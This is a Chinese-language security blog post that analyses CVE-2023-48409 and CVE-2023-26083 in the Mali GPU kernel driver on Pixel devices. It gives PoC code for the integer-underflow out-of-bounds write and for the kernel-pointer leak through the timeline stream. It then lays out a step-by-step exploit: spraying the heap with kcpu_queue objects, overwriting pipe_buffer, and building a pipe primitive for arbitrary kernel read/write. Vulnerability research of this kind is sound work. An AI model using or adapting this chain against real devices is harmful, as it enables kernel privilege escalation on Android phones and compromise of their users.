Mali GPU CVE-2023-48409 分析利用

Mali GPU CVE-2023-48409 分析利用

henry Lv4

Mali GPU: CVE-2023-48409 分析利用

1. Introduction

这一部分利用实际上由两个漏洞组成,分别为

CVE-2023-48409 :负向溢出导致的越界写

CVE-2023-26083 :内存泄露,泄露内核指针

2. Vuln Analysis

Underflow write

CVE-2023-48409

漏洞函数gpu_pixel_handle_buffer_liveness_update_ioctl 内容如下:

nipaste_2025-05-27_16-39-1

call chain

kbase_api_buffer_liveness_update —> gpu_pixel_handle_buffer_liveness_update_ioctl

调用链并不长,漏洞也并不复杂,溢出发生在 kmalloc 的参数当中,即buffer_info_size * 2 + live_ranges_size,其中由于update->buffer_countupdate->live_ranges_count都由用户可控,因此buffer_info_sizelive_ranges_size两个导致溢出的变量也可控,唯一需要思考的是如何利用该溢出去完成漏洞利用(这一步在后面的 Exploit 当中)。

该漏洞有点类似于 CVE-2022-20186,刚进去就有洞,同时这两个漏洞都属于缺乏对用户传递的参数进行有效检查,从而导致整数溢出(或许能够启发我们对 mali gpu 这块的漏洞直觉)。

用户态部分poc参考

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int main(){
// ...
struct kbase_ioctl_buffer_liveness_update u = {};
u.live_ranges_address = (__u64)ptr;
u.buffer_va_address = (__u64)-1; /* no need */
u.buffer_sizes_address = (__u64)-1; /* no need */
__u64 off = 0x8000;
__u64 size = 0x2c01;

__u64 buffer_info_size = 0;
__u64 live_ranges_size = 0;

u.buffer_count = (__u64)(-off/0x10);
u.live_ranges_count = size;

buffer_info_size = sizeof(__u64) * u.buffer_count;
live_ranges_size = sizeof(struct kbase_pixel_gpu_slc_liveness_mark) * u.live_ranges_count;

err = kbase_api_buffer_liveness_update(fd,&u);
// ...
}

漏洞修复如下:

commit: https://android.googlesource.com/kernel/google-modules/gpu/+/68073dce197709c025a520359b66ed12c5430914%5E%21/#F0

Patch

nipaste_2025-05-26_18-04-5

Leak kernel address

CVE-2023-26083

Call Chain

kbase_api_tlstream_acquire –> kbase_timeline_io_acquire –> kbase_timeline_acquire –> kbase_create_timeline_objects –> __kbase_tlstream_tl_kbase_new_kcpuqueue

1. kbase_api_tlstream_acquire

1
2
3
4
5
static int kbase_api_tlstream_acquire(struct kbase_context *kctx,
struct kbase_ioctl_tlstream_acquire *acquire)
{
return kbase_timeline_io_acquire(kctx->kbdev, acquire->flags);
}

2. kbase_timeline_io_acquire

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
int kbase_timeline_io_acquire(struct kbase_device *kbdev, u32 flags)
{
/* The timeline stream file operations structure. */
static const struct file_operations kbasep_tlstream_fops = {
.owner = THIS_MODULE,
.release = kbasep_timeline_io_release,
.read = kbasep_timeline_io_read,
.poll = kbasep_timeline_io_poll,
.fsync = kbasep_timeline_io_fsync,
};
int err;

if (!timeline_is_permitted())
return -EPERM;

if (WARN_ON(!kbdev) || (flags & ~BASE_TLSTREAM_FLAGS_MASK))
return -EINVAL;

err = kbase_timeline_acquire(kbdev, flags); // --> entry
if (err)
return err;

err = anon_inode_getfd("[mali_tlstream]", &kbasep_tlstream_fops, kbdev->timeline,
O_RDONLY | O_CLOEXEC);
if (err < 0)
kbase_timeline_release(kbdev->timeline);

return err;
}

这个函数 kbase_timeline_io_acquireARM Mali GPU 驱动kbase)的一部分,主要用于 获取时间轴流(timeline stream)的文件描述符,以便用户空间可以读取 GPU 的调试和性能分析数据(不禁让人唏嘘竟然可以在普通用户权限下,直接调用该api,泄露 GPU 关键信息)。

函数作用如下:

  1. 创建并返回一个匿名文件描述符,用户空间可以通过该文件描述符读取 GPU 的时间轴流数据(用于调试、性能分析等)。
  2. 检查权限和参数,确保调用者有权访问时间轴流,并且传入的 flags 是有效的。
  3. 初始化时间轴流(如果尚未初始化),并关联到 kbase_device(Mali GPU 设备)。
  4. 如果失败,则释放资源,避免内存泄漏。

**3. kbase_timeline_acquire **

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
int kbase_timeline_acquire(struct kbase_device *kbdev, u32 flags)
{
int err = 0;
u32 timeline_flags = TLSTREAM_ENABLED | flags;
struct kbase_timeline *timeline;
int rcode;

if (WARN_ON(!kbdev) || WARN_ON(flags & ~BASE_TLSTREAM_FLAGS_MASK))
return -EINVAL;

timeline = kbdev->timeline;
if (WARN_ON(!timeline))
return -EFAULT;

if (atomic_cmpxchg(timeline->timeline_flags, 0, timeline_flags))
return -EBUSY;

#if MALI_USE_CSF
if (flags & BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS) {
err = kbase_csf_tl_reader_start(&timeline->csf_tl_reader, kbdev);
if (err) {
atomic_set(timeline->timeline_flags, 0);
return err;
}
}
#endif

/* Reset and initialize header streams. */
kbase_tlstream_reset(&timeline->streams[TL_STREAM_TYPE_OBJ_SUMMARY]);

timeline->obj_header_btc = obj_desc_header_size;
timeline->aux_header_btc = aux_desc_header_size;

#if !MALI_USE_CSF
/* If job dumping is enabled, readjust the software event's
* timeout as the default value of 3 seconds is often
* insufficient.
*/
if (flags & BASE_TLSTREAM_JOB_DUMPING_ENABLED) {
dev_info(kbdev->dev,
"Job dumping is enabled, readjusting the software event's timeout\n");
atomic_set(&kbdev->js_data.soft_job_timeout_ms, 1800000);
}
#endif /* !MALI_USE_CSF */

/* Summary stream was cleared during acquire.
* Create static timeline objects that will be
* read by client.
*/
// 生成 GPU 设备、内存区域等对象的描述信息,供调试工具解析
kbase_create_timeline_objects(kbdev); //-----> leak here

#ifdef CONFIG_MALI_DEVFREQ
/* Devfreq target tracepoints are only fired when the target
* changes, so we won't know the current target unless we
* send it now.
*/
// 记录当前 GPU 频率目标值(用于动态调频分析)
kbase_tlstream_current_devfreq_target(kbdev);
#endif /* CONFIG_MALI_DEVFREQ */

/* Start the autoflush timer.
* We must do this after creating timeline objects to ensure we
* don't auto-flush the streams which will be reset during the
* summarization process.
*/
// 启用定时器,每隔 AUTOFLUSH_INTERVAL 毫秒自动刷新时间轴数据到用户空间
atomic_set(&timeline->autoflush_timer_active, 1);
rcode = mod_timer(&timeline->autoflush_timer,
jiffies + msecs_to_jiffies(AUTOFLUSH_INTERVAL));
CSTD_UNUSED(rcode);

timeline->last_acquire_time = ktime_get_raw();

return err;
}

用户空间通过 ioctl(fd,KBASE_IOCTL_TLSTREAM_ACQUIRE ,&data) 调用此函数,成功后,通过文件描述符读取时间轴数据,时间轴流包含 GPU 调度、内存管理、作业执行等事件。这里我们需要关注的函数是kbase_create_timeline_objects,用于生成 GPU 设备、内存区域等对象的描述信息。

4. kbase_create_timeline_objects

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
void kbase_create_timeline_objects(struct kbase_device *kbdev)
{
unsigned int as_nr;
unsigned int slot_i;
struct kbase_context *kctx;
struct kbase_timeline *timeline = kbdev->timeline;
struct kbase_tlstream *summary =
&kbdev->timeline->streams[TL_STREAM_TYPE_OBJ_SUMMARY];
u32 const kbdev_has_cross_stream_sync =
(kbdev->gpu_props.props.raw_props.gpu_features &
GPU_FEATURES_CROSS_STREAM_SYNC_MASK) ?
1 :
0;
u32 const arch_maj = (kbdev->gpu_props.props.raw_props.gpu_id &
GPU_ID2_ARCH_MAJOR) >>
GPU_ID2_ARCH_MAJOR_SHIFT;
u32 const num_sb_entries = arch_maj >= 11 ? 16 : 8;
u32 const supports_gpu_sleep =
#ifdef KBASE_PM_RUNTIME
kbdev->pm.backend.gpu_sleep_supported;
#else
false;
#endif /* KBASE_PM_RUNTIME */

/* Summarize the Address Space objects. */
for (as_nr = 0; as_nr < kbdev->nr_hw_address_spaces; as_nr++)
__kbase_tlstream_tl_new_as(summary, &kbdev->as[as_nr], as_nr);

/* Create Legacy GPU object to track in AOM for dumping */
__kbase_tlstream_tl_new_gpu(summary,
kbdev,
kbdev->gpu_props.props.raw_props.gpu_id,
kbdev->gpu_props.num_cores);


for (as_nr = 0; as_nr < kbdev->nr_hw_address_spaces; as_nr++)
__kbase_tlstream_tl_lifelink_as_gpu(summary,
&kbdev->as[as_nr],
kbdev);

/*Trace the creation of a new kbase device and set its properties. */
/*记录GPU设备详细信息,包括: GPU ID, 核心数量, 计算着色器组数量, 地址空间数量, 流同步支持等 */
__kbase_tlstream_tl_kbase_new_device(summary, kbdev->gpu_props.props.raw_props.gpu_id,
kbdev->gpu_props.num_cores,
kbdev->csf.global_iface.group_num,
kbdev->nr_hw_address_spaces, num_sb_entries,
kbdev_has_cross_stream_sync, supports_gpu_sleep);

/* Lock the context list, to ensure no changes to the list are made
* while we're summarizing the contexts and their contents.
*/
mutex_lock(&timeline->tl_kctx_list_lock);

/* Hold the scheduler lock while we emit the current state
* We also need to continue holding the lock until after the first body
* stream tracepoints are emitted to ensure we don't change the
* scheduler until after then
*/
rt_mutex_lock(&kbdev->csf.scheduler.lock);

for (slot_i = 0; slot_i < kbdev->csf.global_iface.group_num; slot_i++) {

struct kbase_queue_group *group =
kbdev->csf.scheduler.csg_slots[slot_i].resident_group;

if (group)
__kbase_tlstream_tl_kbase_device_program_csg(
summary,
kbdev->gpu_props.props.raw_props.gpu_id,
group->kctx->id, group->handle, slot_i, 0);
}

/* Reset body stream buffers while holding the kctx lock.
* As we are holding the lock, we can guarantee that no kctx creation or
* deletion tracepoints can be fired from outside of this function by
* some other thread.
*/
// 清空body流,准备写入动态对象信息
kbase_timeline_streams_body_reset(timeline);

rt_mutex_unlock(&kbdev->csf.scheduler.lock);

/* For each context in the device... */
/* 遍历所有GPU上下文,对每个上下文:
1. 获取KCPU队列锁和MMU锁
2. 创建上下文跟踪对象
3. 记录上下文分配的地址空间
4. 处理所有KCPU命令队列
5. 释放锁 */
list_for_each_entry(kctx, &timeline->tl_kctx_list, tl_kctx_list_node) {
size_t i;
struct kbase_tlstream *body =
&timeline->streams[TL_STREAM_TYPE_OBJ];

/* Lock the context's KCPU queues, to ensure no KCPU-queue
* related actions can occur in this context from now on.
*/
mutex_lock(&kctx->csf.kcpu_queues.lock);

/* Acquire the MMU lock, to ensure we don't get a concurrent
* address space assignment while summarizing this context's
* address space.
*/
mutex_lock(&kbdev->mmu_hw_mutex);

/* Trace the context itself into the body stream, not the
* summary stream.
* We place this in the body to ensure it is ordered after any
* other tracepoints related to the contents of the context that
* might have been fired before acquiring all of the per-context
* locks.
* This ensures that those tracepoints will not actually affect
* the object model state, as they reference a context that
* hasn't been traced yet. They may, however, cause benign
* errors to be emitted.
*/
__kbase_tlstream_tl_kbase_new_ctx(body, kctx->id,
kbdev->gpu_props.props.raw_props.gpu_id);

/* Also trace with the legacy AOM tracepoint for dumping */
__kbase_tlstream_tl_new_ctx(body,
kctx,
kctx->id,
(u32)(kctx->tgid));

/* Trace the currently assigned address space */
if (kctx->as_nr != KBASEP_AS_NR_INVALID)
__kbase_tlstream_tl_kbase_ctx_assign_as(body, kctx->id,
kctx->as_nr);


/* Trace all KCPU queues in the context into the body stream.
* As we acquired the KCPU lock after resetting the body stream,
* it's possible that some KCPU-related events for this context
* occurred between that reset and now.
* These will cause errors to be emitted when parsing the
* timeline, but they will not affect the correctness of the
* object model.
*/
// 获取 KCPU 队列信息,其中包含一些内核指针地址信息
for (i = 0; i < KBASEP_MAX_KCPU_QUEUES; i++) {
const struct kbase_kcpu_command_queue *kcpu_queue =
kctx->csf.kcpu_queues.array[i];

if (kcpu_queue)
__kbase_tlstream_tl_kbase_new_kcpuqueue(
body, kcpu_queue, kcpu_queue->id, kcpu_queue->kctx->id,
kcpu_queue->num_pending_cmds); //-------> leak here
}

mutex_unlock(&kbdev->mmu_hw_mutex);
mutex_unlock(&kctx->csf.kcpu_queues.lock);

/* Now that all per-context locks for this context have been
* released, any per-context tracepoints that are fired from
* any other threads will go into the body stream after
* everything that was just summarised into the body stream in
* this iteration of the loop, so will start to correctly update
* the object model state.
*/
}

mutex_unlock(&timeline->tl_kctx_list_lock);

/* Static object are placed into summary packet that needs to be
* transmitted first. Flush all streams to make it available to
* user space.
*/
kbase_timeline_streams_flush(timeline);
}

5. __kbase_tlstream_tl_kbase_new_kcpuqueue

这一步会将相关数据序列化,保存到buffer当中,即stream当中,对应如下:

nipaste_2025-05-27_15-10-2

读出的数据如下图所示:

nipaste_2025-05-27_15-16-4

其中 kernel address 即为 kbase_kcpu_command_queue 结构体(后续为简化说明,均以kcpu_queue 表示)的内核地址。

部分 poc 参考如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
int kbase_api_handshake(int fd,struct kbase_ioctl_version_check *cmd)
{
int ret = ioctl(fd,KBASE_IOCTL_VERSION_CHECK,cmd);
if(ret) {
perror("ioctl(KBASE_IOCTL_VERSION_CHECK)");
}
return ret;
}

int kbase_api_set_flags(int fd, struct kbase_ioctl_set_flags *flags)
{
int ret = ioctl(fd,KBASE_IOCTL_SET_FLAGS,flags);
if(ret) {
perror("ioctl(KBASE_IOCTL_SET_FLAGS)");
}
return ret;
}

int kbase_api_tlstream_acquire(int fd, __u32 flags)
{

struct kbase_ioctl_tlstream_acquire data = { .flags = flags};
int ret = ioctl(fd,KBASE_IOCTL_TLSTREAM_ACQUIRE ,&data);
if(ret < 0 ) {
do_print("ioctl(KBASE_IOCTL_TLSTREAM_ACQUIRE): %s",strerror(errno));
} else {
do_print("Successfully set flags and file descriptor %d\n",ret);

}
return ret;
}


int main()
{
int fd = open_device("/dev/mali0");

struct kbase_ioctl_version_check cmd = {.major = 1, .minor = -1};
kbase_api_handshake(fd, &cmd);
struct kbase_ioctl_set_flags flags = {0};
kbase_api_set_flags(fd,&flags);

struct kcpu_args *ta = (struct kcpu_args *)calloc(sizeof(*ta),1);
ta->fd = fd;

ta->streamfd = kbase_api_tlstream_acquire(ta->fd,BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS);
if(ta->streamfd < 0) assert(1 == 0 && "Unable to have tlstream fd");

ta->kctx_id = kbase_api_get_context_id(ta->fd);
ta->kcpu_id = kbasep_kcpu_queue_new(ta->fd);
ta->kcpu_kaddr = get_kcpu_kaddr(ta);
do_print("[+] Got the kcpu_id (%d) kernel address = 0x%llx from context (0x%x)\n",
ta->kcpu_id,ta->kcpu_kaddr,ta->kcpu_id);
return 0;
}

其中权限检查函数如下,在 linux kernel v5.8 以上执行 perform_capable 进行权限检查

1
2
3
4
5
6
7
8
9
static bool timeline_is_permitted(void)
{
#if KERNEL_VERSION(5, 8, 0) <= LINUX_VERSION_CODE
// return capable(CAP_PERFMON) || capable(CAP_SYS_ADMIN);
return kbase_unprivileged_global_profiling || perfmon_capable();
#else
return kbase_unprivileged_global_profiling || capable(CAP_SYS_ADMIN);
#endif
}

触发溢出,目标结构体选择 pipe_buffer

CONFIG_HARDENED_USERCOPY 使得通用slub分配的堆块,在每次执行copy_from_user的时候会进行检查,拷贝的大小需要与kmem_cache->size 对应

pixel6 中同样的方法不能泄露地址

nipaste_2025-05-27_11-27-0

3. Exploit

理解了前面的溢出和泄露地址,实际利用步骤并不复杂

STEP.1 initialize mali gpu environment

1
2
3
4
5
6
int fd = open_device("/dev/mali0");

struct kbase_ioctl_version_check cmd = {.major = 1, .minor = -1};
kbase_api_handshake(fd, &cmd);
struct kbase_ioctl_set_flags flags = {0};
kbase_api_set_flags(fd,&flags);

STEP.2 Leak kernel address by func kbase_api_tlstream_acquire

1
2
3
4
5
6
7
8
9
10
11
struct kcpu_args *ta = (struct kcpu_args *)calloc(sizeof(*ta),1);
ta->fd = fd;

ta->streamfd = kbase_api_tlstream_acquire(ta->fd,BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS);
if(ta->streamfd < 0) assert(1 == 0 && "Unable to have tlstream fd");

ta->kctx_id = kbase_api_get_context_id(ta->fd);
ta->kcpu_id = kbasep_kcpu_queue_new(ta->fd);
ta->kcpu_kaddr = get_kcpu_kaddr(ta);
do_print("[+] Got the kcpu_id (%d) kernel address = 0x%llx from context (0x%x)\n",
ta->kcpu_id,ta->kcpu_kaddr,ta->kcpu_id);

前两步较为简单,这里不做过多说明

接下来是比较重要的部分,首先需要明确的是用于溢出的 buffer_info_sizelive_range_size 大小选择,这里不妨在回归源码进行分析

nipaste_2025-05-27_16-39-1

其中sizeof(struct kbase_pixel_gpu_slc_liveness_mark) = 4,结构体kbase_pixel_gpu_slc_liveness_mark 内容如下所示,

nipaste_2025-05-27_18-43-1

我们关注到上面的函数完成了通过kmallocbuff的内存空间分配,然后该参数被分配到 info 结构体中的buffer_va 字段,同时info结构体中的live_ranges值设置为buff + update->buffer_count * 2(注意这里 buff 是 u64 指针,所以实际加的时候应该是update->buffer_count * 2 * 8 偏移),同时后面第一个copy_from_user 用于将用户空间的数据传递到info.live_ranges 中。

由于溢出的两个变量都可控,因此,这里可以这样做,将update->buffer_count设置为一个负值,这样 live_ranges 在通过 buff + update->buffer_count * 2 计算后,live_ranges 就指向了 buff 前面的堆块内容,同时由于下面第一个 copy_from_user 就是对 live_ranges 指向的缓冲区赋值,因此就完成了负向越界写。

既然明确了需要将update->buffer_count 设置为负值,那么update->live_ranges_count肯定需要设置为正值(保证kmalloc申请的堆块大小为正),接下来思考的问题就是,这两个值的大小具体应该设置为多少?

首先,我们应该避免直接从 SLUB 内存管理器中分配内存,原因在于CONFIG_HARDENED_USERCOPY,在该默认配置下,执行 copy_from_user 首先会检查复制大小是否小于堆块对应所属缓存大小kmem_cache->size,从而判断拷贝是否非法,相反如果若分配的堆块直接走页面分配管理器(kmalloc size 大于 8K即可),此时该保护就会被绕过。

此时确定了大致的分配大小,现在应该确定越界写的结构体,貌似没有比pipe_buffer 更合适的对象了,只要堆风水得当,由于已经泄露了地址,且在 android 内核中 VMEMMAP BASE 基地址不会被随机化,因此一次越界写就可以让其指向目标读写区域即可。

nipaste_2025-05-27_21-35-4

这里选择的分配大小是 order=2,即分配 0x4000 大小的堆块,原因在于前面泄露的 kcpu_queue 结构体堆块也是从该 order 下分配内存,且我们已经知道了其内核地址,而且该堆块是支持任意分配和任意释放的,因此这为堆喷提供了一个很好的原语。

分配如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int mfds[FDS]  = {};
__u32 kcpu_ids[FDS][KBASEP_MAX_KCPU_QUEUES] = {};
for(int i = 0; i < FDS;i++) {
int ffd = open_device("/dev/mali0");
mfds[i] = ffd;
struct kbase_ioctl_version_check cmd = {.major = 1, .minor = -1};
kbase_api_handshake(ffd, &cmd);
struct kbase_ioctl_set_flags flags = {0};
kbase_api_set_flags(ffd,&flags);
}

/* Spray with page order 2 allocations to make the upcoming allocations
more predictable
*/
for(int i = 0; i < FDS;i++) {
for(int j=0; j < KBASEP_MAX_KCPU_QUEUES ;j++)
kcpu_ids[i][j] = kbasep_kcpu_queue_new(mfds[i]);
}

for(int i=0; i < (255 -1 );i++)
kcpu_ids[FDS][i] = kbasep_kcpu_queue_new(ta->fd);

释放如下:

1
2
struct kbase_ioctl_kcpu_queue_delete _delete = { .id = kcpu_id };
kbasep_kcpu_queue_delete(fd,&_delete);

在原文利用当中具体设置为 update->buffer_count = -0x800update->live_ranges_count = 0x2c01,这样对应的buffer_info_size = -0x4000live_ranges_size = 0xB004 ,从而计算得到 buffer_info_size * 2 + live_ranges_size = -0x4000 * 2 + 0xB004 = 0x3004,0x3004 即为最终 kmalloc 的地址,也会在 order2 中进行分配。

注意:当 copy_from_user 在复制区域时,如果遇到未映射的用户内存会失败,此时先前已经拷贝的数据还是会成功写入,剩下对应内核中复制失败的空间,将会用0填充,同时会返回一个错误值,直接返回,我们这里的目的也是一样,第一次copy_from_user在覆盖完前面 pipe_buffer 的内容后,使其访问未映射空间,从而故意制造失败,让其提前返回,这样后续可以避免 update->buffer_count 过大,导致后面执行 copy_from_user 的时候出现未知状况。

https://elixir.bootlin.com/linux/v5.10.234/source/lib/usercopy.c#L11

nipaste_2025-05-27_23-50-3

由于我们先前 Step.2 也已经泄露出了 kcpu_queue 的内核地址,所以此时可以释放掉该堆块,同时堆喷pipe_buffer 进行堆占位。

nipaste_2025-05-27_21-59-5

在这一步完成之后,即可构造出如下情形,完成二级写管道构建,实现任意地址读写

nipaste_2025-05-27_22-15-2

这里也用到原文中作者提到的一个小技巧,如上图所示,正常来说如果我们执行 read/write 操作的时候会使 offset/len 字段发生变化,从而使下一次读写的位置发生变化,比如说向管道中写了0x28字节,那么下一次写的位置将会偏移0x28字节(表现为len字段),导致不能够重复对上图中的 pipe_buffer C 进行写覆盖。

参考原文中作者给的例子:

我们希望通过 write 将 8 字节的数据写入, 将这8字节的缓冲区后跟未映射或不可读的内存区域,然后将 9作为 size 参数传递给 write 作为参数,指示我们要写入的数据量。此操作会导致实际实际写入的过程中,只成功写入 8 字节,同时由于第9字节所处区域为未映射区域,所以该字节会复制失败,满足失败条件。此时,数据已有效地写入目标内核缓冲区,并且 .len 字段未被修改。pipe_write 内核函数将只返回而不更新 buf->len 字段。对应内核参考代码如下图所示:

https://elixir.bootlin.com/linux/v5.10.234/source/fs/pipe.c#L465

nipaste_2025-05-27_23-38-5

Step

利用步骤如下:

  1. 初始化 mali gpu 环境。
  2. 通过 kbase_api_tlstream_acquire 泄露出kcpu_queue结构体内核地址信息。
  3. 构造 fake pipe_buffer 的内容,这里page字段指向第2步泄露的kcpu_queue 结构体所在的内核地址,这一步主要后面第5步负向溢出写覆盖原始 pipe_buffer 内容。
  4. 堆喷 kcpu_queue 结构体(大小为 0x38c8),用于在后续堆块申请中尽量申请出连续内存。
  5. 申请两块 pipe_buffer 内存(一个用来写,一个用来读),然后设置好 buffer_info_sizelive_range_size ,调用 kbase_api_buffer_liveness_update 触发负向溢出写,覆盖这一步前面申请的两个 pipe_buffer
  6. 释放掉前面第2步的kcpu_queue结构体,堆喷 pipe_buffer 进行堆占位,由于该地址被泄露,因此在堆占位完成之后,相应的 pipe_buffer 的地址可知。
  7. 由于第5步中,我们已经让 fake pipe_bufferpage指向了第6步的地址,此地址空间的内容由于已经被替换为堆喷的pipe_buffer,因此这时候实现了一个二级写管道,从而完成内核任意地址读写。

Final

nipaste_2025-05-28_13-59-0

References

  • Title: Mali GPU CVE-2023-48409 分析利用
  • Author: henry
  • Created at : 2025-05-28 14:06:52
  • Updated at : 2025-05-28 14:20:45
  • Link: https://henrymartin262.github.io/2025/05/28/Pixel_GPU_Exploit/
  • License: This work is licensed under CC BY-NC-SA 4.0.
 Comments